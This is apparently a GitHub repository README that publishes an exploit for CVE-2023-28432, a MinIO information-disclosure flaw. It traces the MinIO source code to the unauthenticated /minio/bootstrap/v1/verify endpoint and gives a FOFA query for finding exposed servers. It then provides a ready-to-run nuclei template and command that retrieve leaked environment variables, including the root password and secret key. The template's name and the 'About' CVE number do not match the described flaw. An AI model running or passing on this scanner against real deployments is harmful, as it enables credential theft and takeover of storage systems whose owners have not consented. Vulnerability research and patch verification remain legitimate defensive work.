Skip to content

Mr-xn/CVE-2023-28432

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits

LICENSE

LICENSE

 
 

README.md

README.md

 
 

Repository files navigation

CVE-2023-28432

CVE-2023-28432 nuclei templates

Dec

Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.

vuln info

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197

// Verify - fetches system server config.
func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) {
	if newObjectLayerFn() != nil {
		return nil
	}
	respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1)
	if err != nil {
		return
	}
	defer xhttp.DrainBody(respBody)
	recvCfg := ServerSystemConfig{}
	if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil {
		return err
	}
	return srcCfg.Diff(recvCfg)
}

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54

const (
	bootstrapRESTVersion       = "v1"
	bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion
	bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap"
	bootstrapRESTPath          = bootstrapRESTPrefix + bootstrapRESTVersionPrefix
)

const (
	bootstrapRESTMethodHealth = "/health"
	bootstrapRESTMethodVerify = "/verify"
)

// To abstract a node over network.
type bootstrapRESTServer struct{}

// ServerSystemConfig - captures information about server configuration.
type ServerSystemConfig struct {
	MinioEndpoints EndpointServerPools
	MinioEnv       map[string]string
}


# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149

func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
	ctx := newContext(r, w, "VerifyHandler")

	if err := storageServerRequestValidate(r); err != nil {
		b.writeErrorResponse(w, err)
		return
	}

	cfg := getServerSystemCfg()
	logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}

// registerBootstrapRESTHandlers - register bootstrap rest router.
func registerBootstrapRESTHandlers(router *mux.Router) {
	server := &bootstrapRESTServer{}
	subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter()

	subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc(
		httpTraceHdrs(server.HealthHandler))

	subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc(
		httpTraceHdrs(server.VerifyHandler))
}

# https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210

// SlashSeparator - slash separator.
const SlashSeparator = "/"

https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138

const (
	minioReservedBucket              = "minio"
	minioReservedBucketPath          = SlashSeparator + minioReservedBucket
	minioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparator

SlashSeparator = "/"
minioReservedBucketPath = SlashSeparator + minioReservedBucket ==> /minio

bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap" ==> /minio/bootstrap/

bootstrapRESTVersion       = "v1"
bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion ==> /v1
bootstrapRESTMethodVerify = "/verify"

subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify/

final path:
/minio/bootstrap/v1/verify/

fofa

app="minio"

EXP

id: CVE-2023-28432
info:
  name: Minio post policy request security bypass
  author: Mr-xn
  severity: high
  description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
  reference:
    - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
    - https://github.com/minio/minio/pull/16853/files
    - https://github.com/golang/vulndb/issues/1667
    - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-28432
    cwe-id: CWE-200
  tags: cve,cve2023,
requests:
  - raw:
      - |+
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"MinioEndpoints"'
      - type: word
        part: header
        words:
          - 'Content-Type: text/plain'
      - type: status
        status:
          - 200

nuclei

nuclei -v -t /path/to/CVE-2023-28432.yaml -u http://target.com:port

reference:

About

CVE-2023-28434 nuclei templates

Topics

minio info-leak

Resources

Readme

License

MIT license
Activity

Stars

31 stars

Watchers

2 watching

Forks

8 forks
Report repository

Releases

No releases published

Packages

No packages published